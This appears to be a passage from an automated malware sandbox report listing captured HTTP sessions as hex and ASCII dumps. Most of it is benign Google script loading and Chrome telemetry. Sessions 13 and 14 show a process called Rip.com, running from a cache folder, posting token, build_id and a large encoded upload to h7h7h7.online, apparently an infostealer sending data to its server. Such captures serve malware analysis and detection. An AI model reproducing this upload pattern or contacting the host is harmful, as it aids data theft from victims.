                                                                                                                                                                                                                                                                      Data Ascii: gapi.loaded_0(function(_){var window=this;_._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([]);var ca,da,ha,ma,xa,Aa,Ba;ca=function(a){var
                                                                                                                                                                                                                                                                      2024-12-31 20:33:36 UTC1390INData Raw: 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 68 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2c 61 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 5d 3b 66 6f 72 28 76 61 72 20 62 3d 30 3b 62 3c 61 2e 6c 65 6e 67 74 68 3b 2b 2b 62 29 7b 76 61 72 20 63 3d 61 5b 62 5d 3b 69 66 28 63 26 26 63 2e 4d 61 74 68 3d 3d 4d 61 74 68 29 72 65 74 75 72 6e 20 63 7d 74 68 72 6f 77 20 45 72 72 6f 72 28 22 61 22 29 3b 7d 3b 5f
                                                                                                                                                                                                                                                                      Data Ascii: lue;return a};ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_
                                                                                                                                                                                                                                                                      2024-12-31 20:33:36 UTC1390INData Raw: 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 3d 61 3b 72 65 74 75 72 6e 20 6e 65 77 20 62 7d 2c 71 61 3b 69 66 28 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 71 61 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3b 65 6c 73 65 7b 76 61 72 20 72 61 3b 61 3a 7b 76 61 72 20 73 61 3d 7b 61 3a 21 30 7d 2c 77 61 3d 7b 7d 3b 74 72 79 7b 77 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 73 61 3b 72 61 3d 77 61 2e 61 3b 62 72 65 61 6b 20 61 7d 63 61 74 63 68 28 61 29 7b 7d 72 61 3d 21 31 7d 71 61 3d 72 61 3f 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 62 3b 69 66 28 61
                                                                                                                                                                                                                                                                      Data Ascii: unction(a){var b=function(){};b.prototype=a;return new b},qa;if(typeof Object.setPrototypeOf=="function")qa=Object.setPrototypeOf;else{var ra;a:{var sa={a:!0},wa={};try{wa.__proto__=sa;ra=wa.a;break a}catch(a){}ra=!1}qa=ra?function(a,b){a.__proto__=b;if(a
                                                                                                                                                                                                                                                                      2024-12-31 20:33:36 UTC1390INData Raw: 66 6f 72 28 3b 74 68 69 73 2e 46 66 26 26 74 68 69 73 2e 46 66 2e 6c 65 6e 67 74 68 3b 29 7b 76 61 72 20 68 3d 74 68 69 73 2e 46 66 3b 74 68 69 73 2e 46 66 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 6b 3d 30 3b 6b 3c 68 2e 6c 65 6e 67 74 68 3b 2b 2b 6b 29 7b 76 61 72 20 6c 3d 68 5b 6b 5d 3b 68 5b 6b 5d 3d 6e 75 6c 6c 3b 74 72 79 7b 6c 28 29 7d 63 61 74 63 68 28 6d 29 7b 74 68 69 73 2e 6d 71 28 6d 29 7d 7d 7d 74 68 69 73 2e 46 66 3d 6e 75 6c 6c 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 71 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 74 68 69 73 2e 7a 50 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 72 6f 77 20 68 3b 0a 7d 29 7d 3b 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 74 68 69 73 2e 45 61 3d 30 3b 74 68 69 73 2e 77 66 3d 76 6f 69 64 20 30 3b 74 68 69 73
                                                                                                                                                                                                                                                                      Data Ascii: for(;this.Ff&&this.Ff.length;){var h=this.Ff;this.Ff=[];for(var k=0;k<h.length;++k){var l=h[k];h[k]=null;try{l()}catch(m){this.mq(m)}}}this.Ff=null};b.prototype.mq=function(h){this.zP(function(){throw h;})};var e=function(h){this.Ea=0;this.wf=void 0;this
                                                                                                                                                                                                                                                                      2024-12-31 20:33:36 UTC1390INData Raw: 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 7b 63 61 6e 63 65 6c 61 62 6c 65 3a 21 30 7d 29 3a 74 79 70 65 6f 66 20 6b 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 68 3d 6e 65 77 20 6b 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 7b 63 61 6e 63 65 6c 61 62 6c 65 3a 21 30 7d 29 3a 28 68 3d 5f 2e 6c 61 2e 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 43 75 73 74 6f 6d 45 76 65 6e 74 22 29 2c 68 2e 69 6e 69 74 43 75 73 74 6f 6d 45 76 65 6e 74 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 21 31 2c 21 30 2c 68 29 29 3b 68 2e 70 72 6f 6d 69 73 65 3d 74 68 69 73 3b 68 2e 72 65 61 73 6f 6e 3d 74 68 69 73 2e 77 66 3b 72 65 74 75 72 6e 20 6c 28 68 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 70
                                                                                                                                                                                                                                                                      Data Ascii: ("unhandledrejection",{cancelable:!0}):typeof k==="function"?h=new k("unhandledrejection",{cancelable:!0}):(h=_.la.document.createEvent("CustomEvent"),h.initCustomEvent("unhandledrejection",!1,!0,h));h.promise=this;h.reason=this.wf;return l(h)};e.prototyp
                                                                                                                                                                                                                                                                      2024-12-31 20:33:36 UTC1390INData Raw: 6f 6e 65 29 7d 29 7d 3b 72 65 74 75 72 6e 20 65 7d 29 3b 76 61 72 20 43 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 61 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 54 68 65 20 27 74 68 69 73 27 20 76 61 6c 75 65 20 66 6f 72 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 22 2b 63 2b 22 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 6e 75 6c 6c 20 6f 72 20 75 6e 64 65 66 69 6e 65 64 22 29 3b 69 66 28 62 20 69 6e 73 74 61 6e 63 65 6f 66 20 52 65 67 45 78 70 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 46 69 72 73 74 20 61 72 67 75 6d 65 6e 74 20 74 6f 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 22 2b 63 2b 22 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 61 20 72 65 67 75 6c 61
                                                                                                                                                                                                                                                                      Data Ascii: one)})};return e});var Ca=function(a,b,c){if(a==null)throw new TypeError("The 'this' value for String.prototype."+c+" must not be null or undefined");if(b instanceof RegExp)throw new TypeError("First argument to String.prototype."+c+" must not be a regula
                                                                                                                                                                                                                                                                      2024-12-31 20:33:36 UTC1390INData Raw: 68 69 64 64 65 6e 5f 22 2b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 3b 65 28 22 66 72 65 65 7a 65 22 29 3b 65 28 22 70 72 65 76 65 6e 74 45 78 74 65 6e 73 69 6f 6e 73 22 29 3b 65 28 22 73 65 61 6c 22 29 3b 76 61 72 20 68 3d 30 2c 6b 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 74 68 69 73 2e 46 61 3d 28 68 2b 3d 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2b 31 29 2e 74 6f 53 74 72 69 6e 67 28 29 3b 69 66 28 6c 29 7b 6c 3d 5f 2e 79 61 28 6c 29 3b 66 6f 72 28 76 61 72 20 6d 3b 21 28 6d 3d 6c 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 6d 3d 6d 2e 76 61 6c 75 65 2c 74 68 69 73 2e 73 65 74 28 6d 5b 30 5d 2c 6d 5b 31 5d 29 7d 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 69 66 28 21 63 28 6c 29 29 74 68 72 6f 77 20 45 72
                                                                                                                                                                                                                                                                      Data Ascii: hidden_"+Math.random();e("freeze");e("preventExtensions");e("seal");var h=0,k=function(l){this.Fa=(h+=Math.random()+1).toString();if(l){l=_.ya(l);for(var m;!(m=l.next()).done;)m=m.value,this.set(m[0],m[1])}};k.prototype.set=function(l,m){if(!c(l))throw Er
                                                                                                                                                                                                                                                                      2024-12-31 20:33:36 UTC1390INData Raw: 68 69 73 5b 31 5d 2e 53 6b 3d 6d 2e 5a 65 2c 74 68 69 73 2e 73 69 7a 65 2b 2b 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 64 65 6c 65 74 65 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 6b 3d 64 28 74 68 69 73 2c 6b 29 3b 72 65 74 75 72 6e 20 6b 2e 5a 65 26 26 6b 2e 6c 69 73 74 3f 28 6b 2e 6c 69 73 74 2e 73 70 6c 69 63 65 28 6b 2e 69 6e 64 65 78 2c 31 29 2c 6b 2e 6c 69 73 74 2e 6c 65 6e 67 74 68 7c 7c 64 65 6c 65 74 65 20 74 68 69 73 5b 30 5d 5b 6b 2e 69 64 5d 2c 6b 2e 5a 65 2e 53 6b 2e 6e 65 78 74 3d 6b 2e 5a 65 2e 6e 65 78 74 2c 6b 2e 5a 65 2e 6e 65 78 74 2e 53 6b 3d 0a 6b 2e 5a 65 2e 53 6b 2c 6b 2e 5a 65 2e 68 65 61 64 3d 6e 75 6c 6c 2c 74 68 69 73 2e 73 69 7a 65 2d 2d 2c 21 30 29 3a 21 31 7d 3b 63 2e 70 72 6f 74 6f 74 79
                                                                                                                                                                                                                                                                      Data Ascii: his[1].Sk=m.Ze,this.size++);return this};c.prototype.delete=function(k){k=d(this,k);return k.Ze&&k.list?(k.list.splice(k.index,1),k.list.length||delete this[0][k.id],k.Ze.Sk.next=k.Ze.next,k.Ze.next.Sk=k.Ze.Sk,k.Ze.head=null,this.size--,!0):!1};c.prototy
                                                                                                                                                                                                                                                                      2024-12-31 20:33:36 UTC1390INData Raw: 74 69 6f 6e 28 29 7b 69 66 28 21 61 7c 7c 74 79 70 65 6f 66 20 61 21 3d 22 66 75 6e 63 74 69 6f 6e 22 7c 7c 21 61 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 7c 7c 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 61 6c 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 63 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 78 3a 34 7d 29 2c 64 3d 6e 65 77 20 61 28 5f 2e 79 61 28 5b 63 5d 29 29 3b 69 66 28 21 64 2e 68 61 73 28 63 29 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 63 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 7b 78 3a 34 7d 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 32 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 65 3d 64 2e 65 6e 74 72 69 65 73 28 29 2c 66 3d 65 2e 6e 65
                                                                                                                                                                                                                                                                      Data Ascii: tion(){if(!a||typeof a!="function"||!a.prototype.entries||typeof Object.seal!="function")return!1;try{var c=Object.seal({x:4}),d=new a(_.ya([c]));if(!d.has(c)||d.size!=1||d.add(c)!=d||d.size!=1||d.add({x:4})!=d||d.size!=2)return!1;var e=d.entries(),f=e.ne
                                                                                                                                                                                                                                                                      2024-12-31 20:33:36 UTC1390INData Raw: 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 46 61 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 72 65 74 75 72 6e 5b 62 2c 63 5d 7d 29 7d 7d 29 3b 0a 6d 61 28 22 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 6b 65 79 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 46 61 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 62 7d 29 7d 7d 29 3b 6d 61 28 22 67 6c 6f 62 61 6c 54 68 69 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 7c 7c 5f 2e 6c 61 7d 29 3b 6d 61 28 22 53 74
                                                                                                                                                                                                                                                                      Data Ascii: ay.prototype.entries",function(a){return a?a:function(){return Fa(this,function(b,c){return[b,c]})}});ma("Array.prototype.keys",function(a){return a?a:function(){return Fa(this,function(b){return b})}});ma("globalThis",function(a){return a||_.la});ma("St


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      12192.168.2.449804142.250.181.2384437320C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-12-31 20:33:37 UTC726OUTPOST /log?format=json&hasfast=true HTTP/1.1
                                                                                                                                                                                                                                                                      Host: play.google.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      Content-Length: 913
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded;charset=UTF-8
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Origin: chrome-untrusted://new-tab-page
                                                                                                                                                                                                                                                                      X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-12-31 20:33:37 UTC913OUTData Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 32 22 5d 2c 5b 31 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 33 37 33 2c 5b 5b 22 31 37 33 35 36 37 37 32 31 34 38 30 38 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c
                                                                                                                                                                                                                                                                      Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,null,null,null,null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.132"],[1,0,0,0,0]]],373,[["1735677214808",null,null,null,
                                                                                                                                                                                                                                                                      2024-12-31 20:33:37 UTC942INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: chrome-untrusted://new-tab-page
                                                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                      Access-Control-Allow-Headers: X-Playlog-Web
                                                                                                                                                                                                                                                                      Set-Cookie: NID=520=l-saQ0ijWo_rKfrukI2OIZWkCRhWmTxEDUMek89LDi0Uuk2IdyEjUhJuyJ-Wdq0BLI3zfXgwIvbTZFhxBidsHbSM-L_3iDCeJRWwvTkxEa-d0eQn1PVLHITfmLE5pwBA7DAEAoU5oEVj56TaHOpj1Pw_UBKM8vhcJGkTr1gXEBAKzPofBt8WYlb5; expires=Wed, 02-Jul-2025 20:33:37 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                                                                                      Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                                      Date: Tue, 31 Dec 2024 20:33:37 GMT
                                                                                                                                                                                                                                                                      Server: Playlog
                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                      Expires: Tue, 31 Dec 2024 20:33:37 GMT
                                                                                                                                                                                                                                                                      Cache-Control: private
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                      2024-12-31 20:33:37 UTC137INData Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
                                                                                                                                                                                                                                                                      2024-12-31 20:33:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      13192.168.2.449810116.203.13.1094437816C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-12-31 20:33:37 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----68gvasj5ph4euaaa1vsj
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                      Host: h7h7h7.online
                                                                                                                                                                                                                                                                      Content-Length: 505
                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                      2024-12-31 20:33:37 UTC505OUTData Raw: 2d 2d 2d 2d 2d 2d 36 38 67 76 61 73 6a 35 70 68 34 65 75 61 61 61 31 76 73 6a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 38 32 36 38 30 62 30 39 33 36 32 31 38 61 36 30 66 66 36 34 37 66 30 62 39 63 38 35 64 62 0d 0a 2d 2d 2d 2d 2d 2d 36 38 67 76 61 73 6a 35 70 68 34 65 75 61 61 61 31 76 73 6a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 36 38 67 76 61 73 6a 35 70 68 34 65 75 61 61 61 31 76 73 6a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                      Data Ascii: ------68gvasj5ph4euaaa1vsjContent-Disposition: form-data; name="token"bc82680b0936218a60ff647f0b9c85db------68gvasj5ph4euaaa1vsjContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------68gvasj5ph4euaaa1vsjCont
                                                                                                                                                                                                                                                                      2024-12-31 20:33:38 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                      Date: Tue, 31 Dec 2024 20:33:38 GMT
                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      2024-12-31 20:33:38 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      14192.168.2.449813116.203.13.1094437816C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-12-31 20:33:39 UTC281OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----s0rqq9zm79hv3ekxbs26
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                      Host: h7h7h7.online
                                                                                                                                                                                                                                                                      Content-Length: 213453
                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                      2024-12-31 20:33:39 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 73 30 72 71 71 39 7a 6d 37 39 68 76 33 65 6b 78 62 73 32 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 38 32 36 38 30 62 30 39 33 36 32 31 38 61 36 30 66 66 36 34 37 66 30 62 39 63 38 35 64 62 0d 0a 2d 2d 2d 2d 2d 2d 73 30 72 71 71 39 7a 6d 37 39 68 76 33 65 6b 78 62 73 32 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 73 30 72 71 71 39 7a 6d 37 39 68 76 33 65 6b 78 62 73 32 36 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                      Data Ascii: ------s0rqq9zm79hv3ekxbs26Content-Disposition: form-data; name="token"bc82680b0936218a60ff647f0b9c85db------s0rqq9zm79hv3ekxbs26Content-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------s0rqq9zm79hv3ekxbs26Cont
                                                                                                                                                                                                                                                                      2024-12-31 20:33:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                      2024-12-31 20:33:39 UTC16355OUTData Raw: 41 59 69 43 78 45 41 41 51 59 42 44 51 51 49 41 77 67 49 44 51 67 49 43 41 67 4a 43 41 41 76 5a 58 64 45 74 42 69 33 43 71 41 41 41 41 59 34 6f 47 49 66 43 68 45 41 41 51 59 42 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 77 41 76 5a 58 64 45 74 42 69 33 43 59 41 41 41 41 59 66 43 52 45 41 41 51 59 42 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 67 41 76 5a 58 64 45 74 42 69 33 43 49 41 41 41 41 59 65 43 42 45 41 41 51 59 49 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 51 41 76 5a 58 64 45 74 42 69 33 45 41 41 41 42 69 49 48 45 51 41 42 42 67 45 4e 42 41 67 44 43 41 67 4e 43 41 67 49 43 41 6b 45 41 43 39 6c 5a 51 58 79 48 55 51 47 6f 41 41 41 42 67 50 73 35 42 38 47 45 51 41 42 42 67 45 4e 42 41 67 49 43 41 67 4e 43 41 67 49 43 41 6b 44
